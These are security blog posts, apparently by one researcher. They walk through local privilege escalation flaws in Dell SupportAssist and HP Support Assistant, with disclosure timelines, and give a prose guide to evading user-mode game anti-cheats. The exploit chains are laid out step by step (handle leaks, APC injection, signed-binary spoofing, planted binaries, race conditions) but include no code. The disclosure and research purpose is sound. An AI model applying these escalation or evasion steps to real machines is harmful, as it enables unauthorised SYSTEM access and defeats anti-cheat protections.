  2. For every process named "explorer", it will check if its session ID matches the active console session ID.
  3. If the explorer process has the same session ID, the agent will duplicate the token of the process.
  4. Finally, if the duplicated token is valid, the Agent will start a child process named SupportAssistAppWire.exe, with InheritHandles set to true.
  5. SupportAssistAppWire.exe will then create the notification.

The flaw in the code can be seen in the call to CreateProcessAsUser.

Local Privilege Escalation on Dell machines running Windows

As we saw in the Discovery section of this post, SupportAssistAgent.exe, an elevated process running as SYSTEM starts a child process using the unelevated explorer token and sets InheritHandles to true. This means that all inheritable handles that the Agent has will be inherited by the child process. It turns out that the thread handle for the service control handler for the Agent is marked as inheritable.

Exploiting

Now that we have a way of getting a FULL CONTROL thread handle to a SYSTEM process, how do we exploit it? Well, the simplest way I thought of was to call LoadLibrary to load our module. In order to do this, we need to get past a few requirements.

  1. We need to be able to predict the address of a buffer that contains a file path that we can access. For example, if we had a buffer with a predictable address that contained "C:\somepath\etc...", we could write a DLL file to that path and pass LoadLibrary the buffer address.
  2. We need to find a way to use QueueUserApc to call LoadLibrary. This means that we need to have the thread become alertable.

I thought of various ways I could have my string loaded into the memory of the Agent, but the difficult part was finding a way to predict the address of the buffer. Then I had an idea. Does LoadLibrary accept files that don’t have a binary extension?

Local Privilege Escalation on Dell machines running Windows

It appeared so! This meant that the file path in a buffer only needed to be a file we can access; not necessarily have a binary extension such as .exe or .dll. To find a buffer that was already in memory, I opted to use Process Hacker which includes a Strings utility with built-in filtering. I scanned for strings in an Image that contained C:\. The first hit I got shocked me.

Local Privilege Escalation on Dell machines running Windows

Look at the address of the first string, 0x180163f88... was a module running without ASLR? Checking the modules list for the Agent, I saw something pretty scary.

Local Privilege Escalation on Dell machines running Windows

A module named sqlite3.dll had been loaded with a base address of 0x180000000. Checking the module in CFF Explorer confirmed my findings.

Local Privilege Escalation on Dell machines running Windows

The DLL was built without the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE characteristic, meaning that ASLR was disabled for it. Somehow this got into the final release build of a piece of software deployed on millions of endpoints. This weakness makes our lives significantly easier because the buffer contained the path c:\dev\sqlite\core\sqlite3.pdb, a file path we could access!

We already determined that the extension makes no difference meaning that if I write a DLL to c:\dev\sqlite\core\sqlite3.pdb and pass the buffer pointer to LoadLibrary, the module we wrote to c:\dev\sqlite\core\sqlite3.pdb should be loaded.

Now that we got the first problem sorted, the next part of our exploitation is to get the thread to be alertable. What I found in my testing is that this thread was the service control handler for the Agent. This meant that the thread was in a Wait Non-Alertable state because it was waiting for a service control signal to come through.

Local Privilege Escalation on Dell machines running Windows

Checking the service permissions for the Agent, I found that the INTERACTIVE group had some permissions. Luckily, INTERACTIVE includes unprivileged users, meaning that the permissions applied directly to us.

Local Privilege Escalation on Dell machines running Windows

Both Interrogate and User-defined control sends a service signal to the thread, meaning we can get out of the Wait state. Since the thread continued execution after receiving a service control signal, we can use SetThreadContext and set the RIP pointer to a target function. The function NtTestAlert was perfect for this situation because it immediately makes the thread alertable and executes our APCs.

To summarize the exploitation process:

  1. The stager monitors for the child SupportAssistAppWire.exe process.
  2. The stager writes a malicious APC DLL to C:\dev\sqlite\core\sqlite3.pdb.
  3. Once the child process is created, the stager injects our malicious DLL into the process.
  4. The DLL finds the leaked thread handle using a brute-force method (NtQuerySystemInformation works just as well).
  5. The DLL sets the RIP register of the Agent's thread to NtTestAlert.
  6. The DLL queues an APC passing in LoadLibraryA for the user routine and 0x180163f88 (buffer pointer) as the first argument.
  7. The DLL issues an INTERROGATE service control to the service.
  8. The Agent then goes to NtTestAlert triggering the APC which causes the APC DLL to be loaded.
  9. The APC DLL starts our malicious binary (for the PoC it's command prompt) while in the context of a SYSTEM process, causing local privilege escalation.

Dell's advisory can be accessed here.

Demo

Privacy concerns

After spending a long time reversing the Dell SupportAssist agent, I've come across a lot of practices that are in my opinion very questionable. I'll leave it up to you, the reader, to decide what you consider acceptable.

  1. On most exceptions, the agent will send the exception detail along with your service tag to Dell's servers.
  2. Whenever a file is executed for Download and Auto install, Dell will send the file name, your service tag, the status of the installer, and the logs for that install to their servers.
  3. Whenever you scan for driver updates, any updates found will be sent to Dell’s servers alongside your service tag.
  4. Whenever Dell retrieves scan results about your bios, pnp drivers, installed programs, and operating system information, all of it is uploaded to Dell servers.
  5. Every week your entire log directory is uploaded to Dell servers (yes, Dell logs by default).
  6. Every two weeks, Dell uploads a “heartbeat” including your device details, alerts, software scans, and much more.

You can disable some of this, but it’s enabled by default. Think about the millions of endpoints running Dell SupportAssist…

Timeline

04/25/2019 - Initial write up and proof of concept sent to Dell.

04/26/2019 - Initial response from Dell.

05/08/2019 - Dell has confirmed the vulnerability.

05/27/2019 - Dell has a fix ready to be released within 2 weeks.

06/19/2019 - Vulnerability disclosed by Dell as an advisory.

06/28/2019 - Vulnerability disclosed at RECON Montreal 2019.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

2 December 2019 at 15:05
Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

The market for cheating in video games has grown year after year, incentivizing game developers to implement stronger anti-cheat solutions. A significant amount of game companies have taken a rather questionable route, implementing more and more invasive anti-cheat solutions in a desperate attempt to combat cheaters, still ending up with a game that has a large cheating community. This choice is understandable. A significant amount of cheaters have now moved into the kernel realm, challenging anti-cheat developers to now design mitigations that combat an attacker who shares the same privilege level. However, not all game companies have followed this invasive path, some opting to use anti-cheats that reside in the user-mode realm.

I've seen a significant amount of cheaters approach user-mode anti-cheats the same way they would approach a kernel anti-cheat, often unknowingly making the assumption that the anti-cheat knows everything, and thus approaching them in an ineffective manner. In this article, we'll look at how to leverage our escalated privileges, as a cheater, to attack the insecure design these unprivileged solutions are built on.

Introduction

When attacking anything technical, one of the first steps I take is to try and put myself in the mind of a defender. For example, when I reverse engineer software for security vulnerabilities, putting myself in the shoes of the developer allows me to better understand the design of the application. Understanding the design behind the logic is critical for vulnerability research, as this often reveals points of weakness that deserve a dedicated look over. When it comes to anti-cheats, the first step I believe any attacker should take is understanding the scope of the application.

What I mean by scope is posing the question, What can the anti-cheat "see" on the machine? This question is incredibly important in researching these anti-cheats, because you may find blind spots on a purely design level. For user-mode anti-cheats, because they live in an unprivileged context, they're unable to access much and must be creative while developing detection vectors. Let's take a look at what access unprivileged anti-cheats truly have and how we can mitigate against it.

Investigating Detection Vectors

The Filesystem

Most access in Windows is restricted by the use of security descriptors, which dictate who has permissions on an object and how to audit the usage of the object.

For example, if a file or directory has the Users group in its security descriptor, i.e

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

That means pretty much any user on the machine can can access this file or directory. When anti-cheats are in an unprivileged context, they're strictly limited in what they can access on the filesystem, because they're unable to ignore these security descriptors. As a cheater, this provides the unique opportunity to abuse these security descriptors against them to stay under their radars.

Filesystem access is a large part of these anti-cheats because if you run a program with elevated privileges, the unprivileged anti-cheat cannot open a handle to that process. This is due to the difference between their elevation levels, but not being able to open the process is far from being game over. The first method anti-cheats can use to "access" the process is by just opening the process's file. More often than not, the security descriptor for a significant amount of files will be accessible from an unprivileged context.

For example, typically anything in the "Program Files" directory in the C: drive has a security descriptor that permits for READ and EXECUTE access to the Users group or allows the Administrators group FULL CONTROL on the directory. Since the Users group is permitted access unprivileged processes are able to access files in these directories. This is relevant for when you launch a cheating program such as Cheat Engine, one detection vector they have is just reading in the file of the process and checking for cheating related signatures.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

NT Object Manager Leaks

Filesystem access is not the only trick user-mode anti-cheats have. The next relevant access these anti-cheats have is a significant amount of query access to the current session. In Windows, sessions are what separates active connections to the machine. For example, you being logged into the machine is a session and someone connected to another user via a Remote Desktop will have their own session too. Unprivileged anti-cheats can see almost everything going on in the session that the anti-cheat runs in. This significant access allows anti-cheats to develop strong detection vectors for a lot of different cheats.

Let's see what unprivileged processes can really see. One neat way to view what's going on in your session is by the use of the WinObj Sysinternals utility. WinObj allows you to see a plethora of information about the machine without any special privileges.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

WinObj can be run with or without Administrator privileges, however, I suggest using Administrator privileges during investigation because sometimes you cannot "list" one of the directories above, but you can "list" sub-folders. For example, even for your own session, you cannot "list" the directory containing the BaseNamedObjects, but you can access it directly using the full path \Session\[session #]\BaseNamedObjects.

User-mode anti-cheat developers hunt for information leaks in these directories because the information leaks can be significantly subtle. For example, a significant amount of tools in kernel expose a device for IOCTL communication. Cheat Engine's kernel driver "DBVM" is an example of a more well-known issue.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

Since by default Everyone can access the Device directory, they can simply check if any devices have a blacklisted name. More subtle leaks happen as well. For example, IDA Pro uses a mutex with a unique name, making it simple to detect when the current session has IDA Pro running.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

Window Enumeration

A classic detection vector for all kinds of anti-cheats is the anti-cheat enumerating windows for certain characteristics. Maybe it's a transparent window that's always the top window, or maybe it's a window with a naughty name. Windows provide for a unique heuristic detection mechanism given that cheats often have some sort of GUI component.

To investigate these leaks, I used Process Hacker's "Windows" tab that shows what windows a process has associated with it. For example, coming back to the Cheat Engine example, there are plenty of windows anti-cheats can look for.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

User-mode anti-cheats can enumerate windows via the use of EnumWindows API (or the API that EnumWindows calls) which allow them to enumerate every window in the current session. There can be many things anti-cheats look for in windows, whether that be the class, text, the process associated with the window, etc.

NtQuerySystemInformation

The next most lethal tool in the arsenal of these anti-cheats is NtQuerySystemInformation. This API allows even unprivileged processes to query a significant amount of information about what's going on in your computer.

There's too much data provided to cover all of it, but let's see some of the highlights of NtQuerySystemInformation.

  1. NtQuerySystemInformation with the class SystemProcessInformation provides a SYSTEM_PROCESS_INFORMATION structure, giving a variety amount of info about every process.
  2. NtQuerySystemInformation with the class SystemModuleInformation provides a RTL_PROCESS_MODULE_INFORMATION structure, giving a variety amount of info about every loaded driver.
  3. NtQuerySystemInformation with the class SystemHandleInformation provides a SYSTEM_HANDLE_INFORMATION structure, giving a list of every open handle in the system.
  4. NtQuerySystemInformation with the class SystemKernelDebuggerInformation provides a SYSTEM_KERNEL_DEBUGGER_INFORMATION structure, which tells the caller whether or not a kernel debugger is loaded (i.e WinDbg KD).
  5. NtQuerySystemInformation with the class SystemHypervisorInformation provides a SYSTEM_HYPERVISOR_QUERY_INFORMATION structure, indicating whether or not a hypervisor is present.
  6. NtQuerySystemInformation with the class SystemCodeIntegrityPolicyInformation provides a SYSTEM_CODEINTEGRITY_INFORMATION structure, indicating whether or not various code integrity options are enabled (i.e Test Signing, Debug Mode, etc).

This is only a small subset of what NtQuerySystemInformation exposes and it's important to remember these data sources while designing a secure cheat.

Circumventing Detection Vectors

Time for my favorite part. What's it worth if I just list all the possible ways for user-mode anti-cheats to detect you, without providing any solutions? In this section, we'll look over the detection vectors we mentioned above and see different ways to mitigate against them. First, let's summarize what we found.

  1. User-mode anti-cheats can use the filesystem to get a wide variety of access, primarily to access processes that are inaccessible via conventional methods (i.e OpenProcess).
  2. User-mode anti-cheats can use a variety of objects Windows exposes to get an insight into what is running in the current session and machine. Often times there may be hard to track information leaks that anti-cheats can use to their advantage, primarily because unprivileged processes have a lot of query power.
  3. User-mode anti-cheats can enumerate the windows of the current session to detect and flag windows that match the attributes of blacklisted applications.
  4. User-mode anti-cheats can utilize the enormous amount of data the NtQuerySystemInformation API provides to peer into what's going on in the system.

Circumventing Filesystem Detection Vectors

To restate the investigation section regarding filesystems, we found that user-mode anti-cheats could utilize the filesystem to get access they once did not have before. How can an attacker evade filesystem based detection routines? By abusing security descriptors.

Security descriptors are what truly dictates who has access to an object, and in the filesystem this becomes especially important in regards to who can read a file. If the user-mode anti-cheat does not have permission to read an object based on its security descriptors, then they cannot read that file. What I mean is, if you run a process as Administrator, preventing the anti-cheat from opening the process and then you remove access to the file, how can the anti-cheat read the file? This method of abusing security descriptors would allow an attacker to evade detections that involve opening processes through the filesystem.

You may feel wary when thinking about restricting unprivileged access to your process, but there are many subtle ways to achieve the same result. Instead of directly setting the security descriptor of the file or folder, why not find existing folders that have restricted security descriptors?

For example, the directory C:\Windows\ModemLogs already prevents unprivileged access.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

The directory by default disallows unprivileged applications from accessing it, requiring at least Administrator privileges to access it. What if you put your naughty binary in here?

Another trick to evade information leaks in places such as the Device directory or BaseNamedObjects directory is to abuse their security descriptors to block access to the anti-cheat. I strongly advise that you utilize a new sandbox account, however, you can set the permissions of directories such as the Device directory to deny access to certain security principles.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

Using security descriptors, we can block access to these directories to prevent anti-cheats from traversing them. All we need to do in the example above is run the game as this new user and they will not have access to the Device directory. Since security descriptors control a significant amount of access in Windows, it's important to understand how we can leverage them to cut off anti-cheats from crucial data sources.

The solution of abusing security descriptors isn't perfect, but the point I'm trying to make is that there is a lot of room for becoming undetected. Given that most anti-cheats have to deal with a mountain full of compatibility issues, it's unlikely that most abuse would be detected.

Circumventing Object Detection and Window Detection

I decided to include both Object and Window detection in this section because the circumvention can overlap. Starting with Object detection, especially when dealing with tools that you didn't create, understanding the information leaks a program has is the key to evading detection.

The example brought up in investigation was the Cheat Engine driver's device name and IDA's mutex. If you're using someone elses software, it's very important that you look for information leaks, primarily because they may not be designed with preventing information leaks in mind.

For example, I was able to make TitanHide undetected by several user-mode anti-cheat platforms by:

  1. Utilizing the previous filesystem trick to prevent access to the driver file.
  2. Changing the pipe name of TitanHide.
  3. Changing the log output of TitanHide.

These steps are simple and not difficult to conceptualize. Read through the source code, understand detection surface, and harden these surfaces. It can be as simple as changing a few names to become undetected.

When creating your own software that has the goal of combating user-mode anti-cheats, information leaks should be a key step when designing the application. Understanding the internals of Windows can help a significant amount, because you can better understand different types of leaks that can occur.

Transitioning to a generic circumvention for both object detection and window detection is through the abuse of multiple sessions. The mentioned EnumWindows API can only enumerate windows in the current session. Unprivileged processes from one session can't access another session's objects. How do you use multiple sessions? There are many ways, but here's the trick I used to bypass a significant amount of user-mode anti-cheats.

  1. I created a new user account.
  2. I set the security descriptor of my naughty tools to be inaccessible by an unprivileged context.
  3. I ran any of my naughty tools by switching users and running it as that user.

Those three simple steps are what allowed me to use even the most common utilities such as Cheat Engine against some of the top user-mode anti-cheats. Unprivileged processes cannot access the processes of another user and they cannot enumerate any objects (including windows) of another session. By switching users, we're entering another session, significantly cutting off the visibility anti-cheats have.

A mentor of mine, Alex Ionescu, pointed out a different approach to preventing an unprivileged process from accessing windows in the current session. He suggested that you can put the game process into a job and then set the JOB_OBJECT_UILIMIT_HANDLES UI restriction. This would restrict any processes in the job from accessing "USER" handles of processes outside of the job, meaning that the user-mode anti-cheat could not access windows in the same session. The drawback of this method is that the anti-cheat could detect this restriction and could choose to crash/flag you. The safest method is generally not touching the process itself and instead evading detection using generic methods (i.e switching sessions).

Circumventing NtQuerySystemInformation

Unlike the previous circumvention methods, evading NtQuerySystemInformation is not as easy. In my opinion, the safest way to evade detection routines that utilize NtQuerySystemInformation is to look at the different information classes that may impact you and ensure you do not have any unique information leaks through those classes.

Although NtQuerySystemInformation does give a significant amount of access, it's important to note that the data returned is often not detailed enough to be a significant threat to cheaters.

If you would like to restrict user-mode anti-cheat access to the API, there is a solution. NtQuerySystemInformation respects the integrity level of the calling process and significantly limits access to Restricted Callers. These callers are primarily those who have a token below the medium integrity level. This sandboxing can allow us to limit a significant amount of access to the user-mode anti-cheat, but with the cost of a potential detection vector. The anti-cheat could choose to crash if its ran under a medium integrity level which would stop this trick.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

When at a low integrity level, processes:

  1. Cannot query handles.
  2. Cannot query kernel modules.
  3. Can only query other processes with equal or lower integrity levels.
  4. Can still query if a kernel debugger is present.

When testing with Process Hacker, I found some games with user-mode anti-cheats already crashed, perhaps because they received an ACCESS_DENIED error for one of their detection routines. An important reminder as with the previous job limit circumvention method. Since this trick does directly touch the process, it is possible anti-cheats can simply crash or flag you for setting their integrity level. Although I would strongly suggest you develop your cheats in a manner that does not allow for detection via NtQuerySystemInformation, this sandboxing trick is a way of suppressing some of the leaked data.

Test Signing

If I haven't yet convinced you that user-mode anti-cheats are easy to circumvent, it gets better. On all of the user-mode anti-cheats I tested test signing was permitted, allowing for essentially any driver to be loaded, including ones you create.

If we go back to our scope, drivers really only have a few detection vectors:

  1. User-mode anti-cheats can utilize NtQuerySystemInformation to get basic information on kernel modules. Specifically, the anti-cheat can obtain the kernel base address, the module size, the path of the driver, and a few other properties. You can view exactly what's returned in the definition of RTL_PROCESS_MODULE_INFORMATION. This can be circumvented by basic security practices such as ensuring the data returned in RTL_PROCESS_MODULE_INFORMATION is unique or by modifying the anti-cheat's integrity level.
  2. User-mode anti-cheats can query the filesystem to obtain the driver contents. This can be circumvented by changing the security descriptor of the driver.
  3. User-mode anti-cheats can hunt for information leaks by your driver (such as using a blacklisted device name) to identify it. This can be circumvented by designing your driver to be secure by design (unlike many of these anti-cheats).

Circumventing the above checks will result in an undetected kernel driver. The information leak prevention can be difficult, however, if you know what you're doing, you should understand what APIs may leak certain information accessible by these anti-cheats.

I hope I have taught you something new about combating user-mode anti-cheats and demystified their capabilities. User-mode anti-cheats come with the benefit of having a less invasive product that doesn't infringe on the privacy of players, but at the same time are incredibly weak and limited. They can appear scary at first, given their usual advantage in detecting "internal" cheaters, but we must realize how weak their position truly is. Unprivileged processes are as the name suggests unprivileged. Stop wasting time treating these products as any sort of challenge, use the operating system's security controls to your advantage. User-mode anti-cheats have already lost, quit acting like they're any stronger than they really are.

Several Critical Vulnerabilities on most HP machines running Windows

3 April 2020 at 12:31
Several Critical Vulnerabilities on most HP machines running Windows

I always have considered bloatware a unique attack surface. Instead of the vulnerability being introduced by the operating system, it is introduced by the manufacturer that you bought your machine from. More tech-savvy folk might take the initiative and remove the annoying software that came with their machine, but will an average consumer? Pre-installed bloatware is the most interesting, because it provides a new attack surface impacting a significant number of users who leave the software on their machines.

For the past year, I've been researching bloatware created by popular computer manufacturers such as Dell and Lenovo. Some of the vulnerabilities I have published include the Remote Code Execution and the Local Privilege Escalation vulnerability I found in Dell's own pre-installed bloatware. More often then not, I have found that this class of software has little-to-no security oversight, leading to poor code quality and a significant amount of security issues.

In this blog post, we'll be looking at HP Support Assistant which is "pre-installed on HP computers sold after October 2012, running Windows 7, Windows 8, or Windows 10 operating systems". We'll be walking through several vulnerabilities taking a close look at discovering and exploiting them.

General Discovery

Before being able to understand how each vulnerability works, we need to understand how HP Support Assistant works on a conceptual level. This section will document the background knowledge needed to understand every vulnerability in this report except for the Remote Code Execution vulnerability.

Opening a few of the binaries in dnSpy revealed that they were "packed" by SmartAssembly. This is an ineffective attempt at security through obscurity as de4dot quickly deobfuscated the binaries.

On start, HP Support Assistant will begin hosting a "service interface" which exposes over 250 different functions to the client. This contract interface is exposed by a WCF Net Named Pipe for access on the local system. In order for a client to connect to the interface, the client creates a connection to the interface by connecting to the pipe net.pipe://localhost/HPSupportSolutionsFramework/HPSA.

This is not the only pipe created. Before a client can call on any of the useful methods in the contract interface, it must be "validated". The client does this by calling on the interface method StartClientSession with a random string as the first argument. The service will take this random string and start two new pipes for that client.

The first pipe is called \\.\pipe\Send_HPSA_[random string] and the second is called \\.\pipe\Receive_HPSA_[random string]. As the names imply, HP uses two different pipes for sending and receiving messages.

After creating the pipes, the client will send the string "Validate" to the service. When the service receives any message over the pipe except "close", it will automatically validate the client – regardless of the message contents ("abcd" will still cause validation).

The service starts by obtaining the process ID of the process it is communicating with using GetNamedPipeClientProcessId on the pipe handle. The service then grabs the full image file name of the process for verification.

The first piece of verification is to ensure that the "main module" property of the C# Process object equals the image name returned by GetProcessImageFileName.

The second verification checks that the process file is not only signed, but the subject of its certificate contains hewlett-packard, hewlett packard, or o=hp inc.

Several Critical Vulnerabilities on most HP machines running Windows

The next verification checks the process image file name for the following:

  1. The process path is "rooted" (not a relative path).
  2. The path does not start with \.
  3. The path does not contain ...
  4. The path does not contain .\.
  5. The path is not a reparse or junction point.
Several Critical Vulnerabilities on most HP machines running Windows

The last piece of client verification is checking that each parent process passes the previous verification steps AND starts with:

  1. C:\Program Files[ (x86)]
  2. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\
  3. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Solutions\
  4. or C:\Windows (excluding C:\Windows\Temp)

If you pass all of these checks, then your "client session" is added to a list of valid clients. A 4-byte integer is generated as a "client ID" which is returned to the client. The client can obtain the required token for calling protected methods by calling the interface method GetClientToken and passing the client ID it received earlier.

One extra check done is on the process file name. If the process file name is either:

  1. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\HPSF.exe
  2. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\ProductConfig.exe
  3. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\HPSFViewer.exe

Then your token is added to a list of "trusted tokens". Using this token, the client can now call certain protected methods.

Before we head into the next section, there is another key design concept important to understanding almost all of the vulnerabilities. In most of the "service methods", the service often accepts several parameters about an "action" to take via a structure called the ActionItemBase. This structure has several pre-defined properties for a variety of methods that is set by the client. Anytime you see a reference to an "action item base property", understand that this property is under the complete control of an attacker.

In the following sections, we’ll be looking at several vulnerabilities found and the individual discovery/exploitation process for each one.

General Exploitation

Before getting into specific exploits, being able to call protected service methods is our number one priority. Most functions in the WCF Service are "protected", which means we will need to be able to call these functions to maximize the potential attack surface. Let’s take a look at some of the mitigations discussed above and how we can bypass them.

A real issue for HP is that the product is insecure by design. There are mitigations which I think serve a purpose, such as the integrity checks mentioned in the previous section, but HP is really fighting a battle they’ve already lost. This is because core components, such as the HP Web Product Detection rely on access to the service and run in an unprivileged context. The fact is, the current way the HP Service is designed, the service must be able to receive messages from unprivileged processes. There will always be a way to talk to the service as long as unprivileged processes are able to talk to the service.

The first choice I made is adding the HP.SupportFramework.ServiceManager.dll binary as a reference to my C# proof-of-concept payload because rewriting the entire client portion of the service would be a significant waste of time. There were no real checks in the binary itself and even if there were, it wouldn't have matter because it was a client-side DLL I controlled. The important checks are on the "server" or service side which handles incoming client connections.

The first important check to bypass is the second one where the service checks that our binary is signed by an HP certificate. This is simple to bypass because we can just fake being an HP binary. There are many ways to do this (i.e Process Doppleganging), but the route I took was starting a signed HP binary suspended and then injecting my malicious C# DLL. This gave me the context of being from an HP Program because I started the signed binary at its real path (in Program Files x86, etc).

To bypass the checks on the parent processes of the connecting client process, I opened a PROCESS_CREATE_PROCESS handle to the Windows Explorer process and used the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute to spoof the parent process.

Feel free to look at the other mitigations, this method bypasses all of them maximizing the attack surface of the service.

Local Privilege Escalation Vulnerabilities

Discovery: Local Privilege Escalation #1 to #3

Before getting into exploitation, we need to review context required to understand each vulnerability.

Let’s start with the protected service method named InstallSoftPaq. I don’t really know what "SoftPaq" stands for, maybe software package? Regardless, this method is used to install HP updates and software.

Several Critical Vulnerabilities on most HP machines running Windows

The method takes three arguments. First is an ActionItemBase object which specifies several details about what to install. Second is an integer which specifies the timeout for the installer that is going to be launched. Third is a Boolean indicating whether or not to install directly, it has little to no purpose because the service method uses the ActionItemBase to decide if it's installing directly.

The method begins by checking whether or not the action item base ExecutableName property is empty. If it is, the executable name will be resolved by concatenating both the action item base SPName property and .exe.

If the action item base property SilentInstallString is not empty, it will take a different route for executing the installer. This method is assumed to be the "silent install" method whereas the other one is a direct installer.

Silent Install

Several Critical Vulnerabilities on most HP machines running Windows

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

Several Critical Vulnerabilities on most HP machines running Windows

The method will then check to make sure that C:\Windows\TEMP + the action item base property ExecutableName exists as a file. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

Several Critical Vulnerabilities on most HP machines running Windows

If the SilentInstallString property of the action item base contains the SPName property + .exe, the current directory for the new process will be the temporary directory. Otherwise, the method will set the current directory for the new process to C:\swsetup\ + the ExecutableName property.

Furthermore, if the latter, the service will start the previously copied Extract.exe binary and attempt to extract the download into current directory + the ExecutableName property after stripping .exe from the string. If the extraction folder already exists, it is deleted before execution. When the Extract.exe binary has finished executing, the sub-method will return true. If the extraction method returns false, typically due to an exception that occurred, the download is stopped in its tracks.

Several Critical Vulnerabilities on most HP machines running Windows

After determining the working directory and extracting the download if necessary, the method splits the SilentInstallString property into an array using a double quote as the delimiter.

If the silent install split array has a length less than 2, the installation is stopped in its tracks with an error indicating that the silent install string is invalid. Otherwise, the method will check if the second element (index 1) of the split array contains .exe, .msi, or .cmd. If it does not, the installation is stopped.

The method will then take the second element and concatenate it with the previously resolved current directory + the executable name with .exe stripped + \ + the second element. For example, if the second element was cat.exe and the executable name property was cats, the resolved path would be the current directory + \cats\cat.exe. If this resolved path does not exist, the installation stops.

If you passed the previous checks and the resolved path exists, the binary pointed to by the resolved path is executed. The arguments passed to the binary is the silent install string, however, the resolved path is removed from it. The installation timeout (minutes) is dictated by the second argument passed to InstallSoftPaq.

After the binary has finished executing or been terminated for passing the timeout period, the method returns the status of the execution and ends.

Direct Install

When no silent install string is provided, a method named StartInstallSoftpaqsDirectly is executed.

The method will then check to make sure that the result of the Path.Combine method with C:\Windows\TEMP and the action item base property ExecutableName as arguments exists as a file. If the file does not exist, the method stops and returns with a failure. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

The method will then create a new scheduled task for the current time. The task is set to be executed by the Administrators group and if an Administrator is logged in, the specified program is executed immediately.

Exploitation: Local Privilege Escalation #1 to #3

Local Privilege Escalation #1

The first simple vulnerability causing Local Privilege Escalation is in the silent install route of the exposed service method named InstallSoftPaq. Quoting the discovery portion of this section,

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

This is where the bug lies. Unprivileged users can write to C:\Windows\TEMP, but cannot enumerate the directory (thanks Matt Graeber!). This allows an unprivileged attacker to write a malicious binary named Extract.exe to C:\Windows\TEMP, appending enough NULL bytes to match the size of the actual Extract.exe in HP's installation directory.

Here are the requirements of the attacker-supplied action item base:

  1. The action item base property SilentInstallString must be defined to something other than an empty string.
  2. The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
  3. This file must also be signed by HP.
  4. The action item base property SilentInstallString must not contain the value of the property SPName + .exe.

If these requirements are passed, when the method attempts to start the extractor, it will start our malicious binary as NT AUTHORITY\SYSTEM achieving Local Privilege Escalation.

Local Privilege Escalation #2

The second Local Privilege Escalation vulnerability again lies in the silent install route of the exposed service method named InstallSoftPaq. Let’s review what requirements we need to pass in order to have the method start our malicious binary.

  1. The action item base property SilentInstallString must be defined to something other than an empty string.
  2. The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
  3. This file must also be signed by HP.
  4. If the SPName property + .exe is in the SilentInstallString property, the current directory is C:\Windows\TEMP. Otherwise, the current directory is C:\swsetup\ + the ExecutableName property with .exe stripped. The resulting path does not need to exist.
  5. The action item base property SilentInstallString must have at least one double quote.
  6. The action item base property SilentInstallString must have a valid executable name after the first double quote (i.e a valid value could be something"cat.exe). This executable name is the "binary name".
  7. The binary name must contain .exe or .msi.
  8. The file at current directory + \ + the binary name must exist.

If all of these requirements are passed, the method will execute the binary at current directory + \ + binary name.

The eye-catching part about these requirements is that we can cause the "current directory", where the binary gets executed, to be in a directory path that can be created with low privileges. Any user is able to create folders in the C:\ directory, therefore, we can create the path C:\swsetup and have the current directory be that.

We need to make sure not to forget that the executable name has .exe stripped from it and this directory is created within C:\swsetup. For example, if we pass the executable name as dog.exe, we can have the current directory be C:\swsetup\dog. The only requirement if we go this route is that the same executable name exists in C:\Windows\TEMP. Since unprivileged users can write into the C:\Windows\TEMP directory, we simply can write a dog.exe into the directory and pass the first few checks. The best part is, the binary in the temp directory does not need to be the same binary in the C:\swsetup\dog directory. This means we can place a signed HP binary in the temp directory and a malicious binary in our swsetup directory.

A side-effect of having swsetup as our current directory is that the method will first try to "extract" the file in question. In the process of extracting the file, the method first checks if the swsetup directory exists. If it does, it deletes it. This is perfect for us, because we can easily tell when the function is almost at executing allowing us to quickly copy the malicious binary after re-creating the directory.

After extraction is attempted and after we place our malicious binary, the method will grab the filename to execute by grabbing the string after the first double quote character in the SilentInstallString parameter. This means if we set the parameter to be a"BadBinary.exe, the complete path for execution will be the current directory + BadBinary.exe. Since our current directory is C:\swsetup\dog, the complete path to the malicious binary becomes C:\swsetup\dog\BadBinary.exe. The only check on the file specified after the double quote is that it exists, there are no signature checks.

Once the final path is determined, the method starts the binary. For us, this means our malicious binary is executed.
To review the example above:

  1. We place a signed HP binary named dog.exe in C:\Windows\TEMP.
  2. We create the directory chain C:\swsetup\dog.
  3. We pass in an action item base with the ExecutableName property set to dog.exe, the SPName property set to anything but BadBinary, and the SilentInstallString property set to a"BadBinary.exe.
  4. We monitor the C:\swsetup\dog directory until it is deleted.
  5. Once we detect that the dog folder is deleted, we immediately recreate it and copy in our BadBinary.exe.
  6. Our BadBinary.exe gets executed with SYSTEM permissions.

Local Privilege Escalation #3

The next Local Privilege Escalation vulnerability is accessible by both the previous protected method InstallSoftpaq and InstallSoftpaqDirectly. This exploit lies in the previously mentioned direct install method.

This method starts off similarly to its silent install counterpart by concatenating C:\Windows\TEMP and the action item base ExecutableName property. Again similarly, the method will verify that the path specified is a binary signed by HP. The mildly interesting difference here is that instead of doing an unsafe concatenation operation by just adding the two strings using the + operator, the method uses Path.Combine, the safe way to concatenate path strings.

